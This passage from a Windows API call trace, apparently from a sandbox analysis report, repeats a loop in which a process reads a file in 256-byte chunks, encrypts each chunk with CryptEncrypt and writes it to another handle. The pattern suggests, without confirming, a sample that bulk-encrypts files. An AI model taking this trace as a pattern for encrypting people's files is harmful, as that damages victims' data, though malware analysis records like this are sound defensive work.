lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.627] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.627] GetLastError () returned 0x0 [0143.627] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.627] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.627] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.627] GetLastError () returned 0x0 [0143.627] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.627] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.627] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.627] GetLastError () returned 0x0 [0143.627] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.627] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.628] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.628] GetLastError () returned 0x0 [0143.628] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.628] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.628] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.628] GetLastError () returned 0x0 [0143.628] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.628] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.628] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.628] GetLastError () returned 0x0 [0143.628] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.628] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.628] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.628] GetLastError () returned 0x0 [0143.628] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.628] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.628] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.628] GetLastError () returned 0x0 [0143.628] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.628] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.628] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.628] GetLastError () returned 0x0 [0143.628] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.628] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.628] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.628] GetLastError () returned 0x0 [0143.629] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.629] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.629] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.629] GetLastError () returned 0x0 [0143.629] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.629] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.629] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.629] GetLastError () returned 0x0 [0143.629] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.629] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.629] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.629] GetLastError () returned 0x0 [0143.629] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.629] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.629] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.629] GetLastError () returned 0x0 [0143.629] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.629] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.629] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.629] GetLastError () returned 0x0 [0143.629] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.629] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.629] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.629] GetLastError () returned 0x0 [0143.629] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.629] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.630] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.630] GetLastError () returned 0x0 [0143.630] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.630] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.630] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.630] GetLastError () returned 0x0 [0143.630] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.630] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.630] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.630] GetLastError () returned 0x0 [0143.630] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.630] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.630] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.630] GetLastError () returned 0x0 [0143.630] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.630] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.630] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.630] GetLastError () returned 0x0 [0143.630] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.630] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.630] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.630] GetLastError () returned 0x0 [0143.630] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.631] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.631] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.631] GetLastError () returned 0x0 [0143.631] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.631] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.631] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.631] GetLastError () returned 0x0 [0143.631] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.631] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.631] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.631] GetLastError () returned 0x0 [0143.631] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.631] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.631] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.631] GetLastError () returned 0x0 [0143.631] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.631] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.631] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.632] GetLastError () returned 0x0 [0143.632] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.632] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.632] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.632] GetLastError () returned 0x0 [0143.632] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.632] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.632] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.632] GetLastError () returned 0x0 [0143.632] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.632] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.632] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.632] GetLastError () returned 0x0 [0143.632] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.632] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.632] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.632] GetLastError () returned 0x0 [0143.632] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.632] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.632] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.632] GetLastError () returned 0x0 [0143.632] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.633] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.633] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, 